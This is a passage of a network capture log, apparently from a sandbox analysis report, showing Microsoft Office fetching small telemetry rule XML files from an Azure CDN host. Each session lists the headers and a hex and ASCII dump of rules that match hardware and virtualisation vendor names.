                                                                              X-Cache: TCP_HIT
                                                                              Accept-Ranges: bytes
                                                                              2024-10-26 06:49:36 UTC427INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 33 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 50 70 5d 5b 41 61 5d 5b 52 72 5d 5b 41 61 5d 5b 4c 6c 5d 5b 4c 6c 5d 5b 45 65 5d 5b 4c 6c 5d 5b 53 73 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20
                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120663" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120661" /> <SR T="2" R="([Pp][Aa][Rr][Aa][Ll][Ll][Ee][Ll][Ss])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W"


                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                              85192.168.2.44984013.107.246.45443
                                                                              TimestampBytes transferredDirectionData
                                                                              2024-10-26 06:49:37 UTC192OUTGET /rules/rule120666v0s19.xml HTTP/1.1
                                                                              Connection: Keep-Alive
                                                                              Accept-Encoding: gzip
                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                              Host: otelrules.azureedge.net
                                                                              2024-10-26 06:49:37 UTC470INHTTP/1.1 200 OK
                                                                              Date: Sat, 26 Oct 2024 06:49:37 GMT
                                                                              Content-Type: text/xml
                                                                              Content-Length: 474
                                                                              Connection: close
                                                                              Cache-Control: public, max-age=604800, immutable
                                                                              Last-Modified: Tue, 09 Apr 2024 00:26:30 GMT
                                                                              ETag: "0x8DC582BB3F48DAE"
                                                                              x-ms-request-id: 4b1c8405-301e-005d-7701-27e448000000
                                                                              x-ms-version: 2018-03-28
                                                                              x-azure-ref: 20241026T064937Z-16849878b78xblwksrnkakc08w00000000w000000000chzv
                                                                              x-fd-int-roxy-purgeid: 0
                                                                              X-Cache: TCP_HIT
                                                                              Accept-Ranges: bytes
                                                                              2024-10-26 06:49:37 UTC474INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 36 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120666" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120665" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                              86192.168.2.44983913.107.246.45443
                                                                              TimestampBytes transferredDirectionData
                                                                              2024-10-26 06:49:37 UTC192OUTGET /rules/rule120665v0s19.xml HTTP/1.1
                                                                              Connection: Keep-Alive
                                                                              Accept-Encoding: gzip
                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                              Host: otelrules.azureedge.net
                                                                              2024-10-26 06:49:37 UTC470INHTTP/1.1 200 OK
                                                                              Date: Sat, 26 Oct 2024 06:49:37 GMT
                                                                              Content-Type: text/xml
                                                                              Content-Length: 407
                                                                              Connection: close
                                                                              Cache-Control: public, max-age=604800, immutable
                                                                              Last-Modified: Tue, 09 Apr 2024 00:25:52 GMT
                                                                              ETag: "0x8DC582B9D30478D"
                                                                              x-ms-request-id: 3c45f43b-a01e-00ab-363f-269106000000
                                                                              x-ms-version: 2018-03-28
                                                                              x-azure-ref: 20241026T064937Z-17c5cb586f6hn8cl90dxzu28kw00000001eg00000000akfv
                                                                              x-fd-int-roxy-purgeid: 0
                                                                              X-Cache: TCP_HIT
                                                                              Accept-Ranges: bytes
                                                                              2024-10-26 06:49:37 UTC407INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 35 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 50 70 5d 5b 53 73 5d 5b 53 73 5d 5b 43 63 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 20
                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120665" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120663" /> <SR T="2" R="([Pp][Ss][Ss][Cc])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true">


                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                              87192.168.2.44984213.107.246.45443
                                                                              TimestampBytes transferredDirectionData
                                                                              2024-10-26 06:49:37 UTC192OUTGET /rules/rule120667v0s19.xml HTTP/1.1
                                                                              Connection: Keep-Alive
                                                                              Accept-Encoding: gzip
                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                              Host: otelrules.azureedge.net
                                                                              2024-10-26 06:49:37 UTC498INHTTP/1.1 200 OK
                                                                              Date: Sat, 26 Oct 2024 06:49:37 GMT
                                                                              Content-Type: text/xml
                                                                              Content-Length: 408
                                                                              Connection: close
                                                                              Cache-Control: public, max-age=604800, immutable
                                                                              Last-Modified: Tue, 09 Apr 2024 00:26:40 GMT
                                                                              ETag: "0x8DC582BB9B6040B"
                                                                              x-ms-request-id: 4814b401-401e-005b-1e73-279c0c000000
                                                                              x-ms-version: 2018-03-28
                                                                              x-azure-ref: 20241026T064937Z-r197bdfb6b4bs5qf58wn14wgm000000000r0000000000ct7
                                                                              x-fd-int-roxy-purgeid: 0
                                                                              X-Cache-Info: L2_T2
                                                                              X-Cache: TCP_REMOTE_HIT
                                                                              Accept-Ranges: bytes
                                                                              2024-10-26 06:49:37 UTC408INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 51 71 5d 5b 45 65 5d 5b 4d 6d 5d 5b 55 75 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20
                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120667" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120665" /> <SR T="2" R="^([Qq][Ee][Mm][Uu])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true">


                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                              88192.168.2.44984313.107.246.45443
                                                                              TimestampBytes transferredDirectionData
                                                                              2024-10-26 06:49:37 UTC192OUTGET /rules/rule120668v0s19.xml HTTP/1.1
                                                                              Connection: Keep-Alive
                                                                              Accept-Encoding: gzip
                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                              Host: otelrules.azureedge.net
                                                                              2024-10-26 06:49:37 UTC470INHTTP/1.1 200 OK
                                                                              Date: Sat, 26 Oct 2024 06:49:37 GMT
                                                                              Content-Type: text/xml
                                                                              Content-Length: 469
                                                                              Connection: close
                                                                              Cache-Control: public, max-age=604800, immutable
                                                                              Last-Modified: Tue, 09 Apr 2024 00:26:30 GMT
                                                                              ETag: "0x8DC582BB3CAEBB8"
                                                                              x-ms-request-id: e1e6f089-901e-005b-1e15-262005000000
                                                                              x-ms-version: 2018-03-28
                                                                              x-azure-ref: 20241026T064937Z-15b8d89586fnsf5zd126eyaetw00000002z00000000005cz
                                                                              x-fd-int-roxy-purgeid: 0
                                                                              X-Cache: TCP_HIT
                                                                              Accept-Ranges: bytes
                                                                              2024-10-26 06:49:37 UTC469INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120668" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120667" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                              89192.168.2.44984413.107.246.45443
                                                                              TimestampBytes transferredDirectionData
                                                                              2024-10-26 06:49:37 UTC192OUTGET /rules/rule120669v0s19.xml HTTP/1.1
                                                                              Connection: Keep-Alive
                                                                              Accept-Encoding: gzip
                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                              Host: otelrules.azureedge.net
                                                                              2024-10-26 06:49:37 UTC470INHTTP/1.1 200 OK
                                                                              Date: Sat, 26 Oct 2024 06:49:37 GMT
                                                                              Content-Type: text/xml
                                                                              Content-Length: 416
                                                                              Connection: close
                                                                              Cache-Control: public, max-age=604800, immutable
                                                                              Last-Modified: Tue, 09 Apr 2024 00:26:32 GMT
                                                                              ETag: "0x8DC582BB5284CCE"
                                                                              x-ms-request-id: d9732123-901e-007b-1098-25ac50000000
                                                                              x-ms-version: 2018-03-28
                                                                              x-azure-ref: 20241026T064937Z-16849878b78smng4k6nq15r6s40000000370000000005fvz
                                                                              x-fd-int-roxy-purgeid: 0
                                                                              X-Cache: TCP_HIT
                                                                              Accept-Ranges: bytes
                                                                              2024-10-26 06:49:37 UTC416INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 52 72 5d 5b 45 65 5d 5b 44 64 5d 20 5b 48 68 5d 5b 41 61 5d 5b 54 74 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72
                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120669" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120667" /> <SR T="2" R="([Rr][Ee][Dd] [Hh][Aa][Tt])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="tr


                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                              90192.168.2.44984613.107.246.45443
                                                                              TimestampBytes transferredDirectionData
                                                                              2024-10-26 06:49:38 UTC192OUTGET /rules/rule120671v0s19.xml HTTP/1.1
                                                                              Connection: Keep-Alive
                                                                              Accept-Encoding: gzip
                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                              Host: otelrules.azureedge.net
                                                                              2024-10-26 06:49:38 UTC491INHTTP/1.1 200 OK
                                                                              Date: Sat, 26 Oct 2024 06:49:38 GMT
                                                                              Content-Type: text/xml
                                                                              Content-Length: 432
                                                                              Connection: close
                                                                              Cache-Control: public, max-age=604800, immutable
                                                                              Last-Modified: Tue, 09 Apr 2024 00:26:15 GMT
                                                                              ETag: "0x8DC582BAABA2A10"
                                                                              x-ms-request-id: 63249b2a-c01e-0046-2e2c-262db9000000
                                                                              x-ms-version: 2018-03-28
                                                                              x-azure-ref: 20241026T064938Z-17c5cb586f69w69mgazyf263an00000000sg000000003xdg
                                                                              x-fd-int-roxy-purgeid: 0
                                                                              X-Cache-Info: L1_T2
                                                                              X-Cache: TCP_HIT
                                                                              Accept-Ranges: bytes
                                                                              2024-10-26 06:49:38 UTC432INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 53 73 5d 5b 55 75 5d 5b 50 70 5d 5b 45 65 5d 5b 52 72 5d 5b 4d 6d 5d 5b 49 69 5d 5b 43 63 5d 5b 52 72 5d 5b 4f 6f 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54
                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120671" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120669" /> <SR T="2" R="^([Ss][Uu][Pp][Ee][Rr][Mm][Ii][Cc][Rr][Oo])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T


                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                              91192.168.2.44984513.107.246.45443
                                                                              TimestampBytes transferredDirectionData
                                                                              2024-10-26 06:49:38 UTC192OUTGET /rules/rule120670v0s19.xml HTTP/1.1
                                                                              Connection: Keep-Alive
                                                                              Accept-Encoding: gzip
                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                              Host: otelrules.azureedge.net
                                                                              2024-10-26 06:49:38 UTC491INHTTP/1.1 200 OK
                                                                              Date: Sat, 26 Oct 2024 06:49:38 GMT
                                                                              Content-Type: text/xml
                                                                              Content-Length: 472
                                                                              Connection: close
                                                                              Cache-Control: public, max-age=604800, immutable
                                                                              Last-Modified: Tue, 09 Apr 2024 00:25:33 GMT
                                                                              ETag: "0x8DC582B91EAD002"
                                                                              x-ms-request-id: 933aac65-d01e-007a-51aa-26f38c000000
                                                                              x-ms-version: 2018-03-28
                                                                              x-azure-ref: 20241026T064938Z-16849878b78j5kdg3dndgqw0vg00000003fg000000000tqy
                                                                              x-fd-int-roxy-purgeid: 0
                                                                              X-Cache: TCP_HIT
                                                                              X-Cache-Info: L1_T2
                                                                              Accept-Ranges: bytes
                                                                              2024-10-26 06:49:38 UTC472INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120670" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120669" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                              92192.168.2.44984713.107.246.45443
                                                                              TimestampBytes transferredDirectionData
                                                                              2024-10-26 06:49:38 UTC192OUTGET /rules/rule120672v0s19.xml HTTP/1.1
                                                                              Connection: Keep-Alive
                                                                              Accept-Encoding: gzip
                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                              Host: otelrules.azureedge.net
                                                                              2024-10-26 06:49:38 UTC470INHTTP/1.1 200 OK
                                                                              Date: Sat, 26 Oct 2024 06:49:38 GMT
                                                                              Content-Type: text/xml
                                                                              Content-Length: 475
                                                                              Connection: close
                                                                              Cache-Control: public, max-age=604800, immutable
                                                                              Last-Modified: Tue, 09 Apr 2024 00:26:41 GMT
                                                                              ETag: "0x8DC582BBA740822"
                                                                              x-ms-request-id: 4ecf21c8-401e-002a-0558-26c62e000000
                                                                              x-ms-version: 2018-03-28
                                                                              x-azure-ref: 20241026T064938Z-17c5cb586f66g7mvbfuqdb2m3n00000001qg000000008khf
                                                                              x-fd-int-roxy-purgeid: 0
                                                                              X-Cache: TCP_HIT
                                                                              Accept-Ranges: bytes
                                                                              2024-10-26 06:49:38 UTC475INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 37 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120672" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120671" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                              93192.168.2.44984813.107.246.45443
                                                                              TimestampBytes transferredDirectionData
                                                                              2024-10-26 06:49:38 UTC192OUTGET /rules/rule120673v0s19.xml HTTP/1.1
                                                                              Connection: Keep-Alive
                                                                              Accept-Encoding: gzip
                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                              Host: otelrules.azureedge.net
                                                                              2024-10-26 06:49:38 UTC491INHTTP/1.1 200 OK
                                                                              Date: Sat, 26 Oct 2024 06:49:38 GMT
                                                                              Content-Type: text/xml
                                                                              Content-Length: 427
                                                                              Connection: close
                                                                              Cache-Control: public, max-age=604800, immutable
                                                                              Last-Modified: Tue, 09 Apr 2024 00:26:31 GMT
                                                                              ETag: "0x8DC582BB464F255"
                                                                              x-ms-request-id: a2e914b6-401e-0029-5fce-219b43000000
                                                                              x-ms-version: 2018-03-28
                                                                              x-azure-ref: 20241026T064938Z-16849878b78rjhv97f3nhawr7s0000000a7g00000000e7f2
                                                                              x-fd-int-roxy-purgeid: 0
                                                                              X-Cache-Info: L1_T2
                                                                              X-Cache: TCP_HIT
                                                                              Accept-Ranges: bytes
                                                                              2024-10-26 06:49:38 UTC427INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 33 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 37 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 54 74 5d 5b 48 68 5d 5b 49 69 5d 5b 4e 6e 5d 5b 50 70 5d 5b 55 75 5d 5b 54 74 5d 5b 45 65 5d 5b 52 72 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20
                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120673" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120671" /> <SR T="2" R="([Tt][Hh][Ii][Nn][Pp][Uu][Tt][Ee][Rr])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W"


                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                              94192.168.2.44984913.107.246.45443
                                                                              TimestampBytes transferredDirectionData
                                                                              2024-10-26 06:49:38 UTC192OUTGET /rules/rule120674v0s19.xml HTTP/1.1
                                                                              Connection: Keep-Alive
                                                                              Accept-Encoding: gzip
                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                              Host: otelrules.azureedge.net
                                                                              2024-10-26 06:49:38 UTC470INHTTP/1.1 200 OK
                                                                              Date: Sat, 26 Oct 2024 06:49:38 GMT
                                                                              Content-Type: text/xml
                                                                              Content-Length: 474
                                                                              Connection: close
                                                                              Cache-Control: public, max-age=604800, immutable
                                                                              Last-Modified: Tue, 09 Apr 2024 00:26:03 GMT
                                                                              ETag: "0x8DC582BA4037B0D"
                                                                              x-ms-request-id: cfcfc7b9-001e-0065-0f5b-260b73000000
                                                                              x-ms-version: 2018-03-28
                                                                              x-azure-ref: 20241026T064938Z-17c5cb586f62blg5ss55p9d6fn000000022000000000d2wa
                                                                              x-fd-int-roxy-purgeid: 0
                                                                              X-Cache: TCP_HIT
                                                                              Accept-Ranges: bytes
                                                                              2024-10-26 06:49:38 UTC474INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 34 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 37 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120674" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120673" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                              95192.168.2.44985013.107.246.45443
                                                                              TimestampBytes transferredDirectionData
                                                                              2024-10-26 06:49:39 UTC192OUTGET /rules/rule120675v0s19.xml HTTP/1.1
                                                                              Connection: Keep-Alive
                                                                              Accept-Encoding: gzip
                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                              Host: otelrules.azureedge.net
                                                                              2024-10-26 06:49:39 UTC470INHTTP/1.1 200 OK
                                                                              Date: Sat, 26 Oct 2024 06:49:39 GMT
                                                                              Content-Type: text/xml
                                                                              Content-Length: 419
                                                                              Connection: close
                                                                              Cache-Control: public, max-age=604800, immutable
                                                                              Last-Modified: Tue, 09 Apr 2024 00:26:08 GMT
                                                                              ETag: "0x8DC582BA6CF78C8"
                                                                              x-ms-request-id: c561987e-801e-0015-0d0b-22f97f000000
                                                                              x-ms-version: 2018-03-28
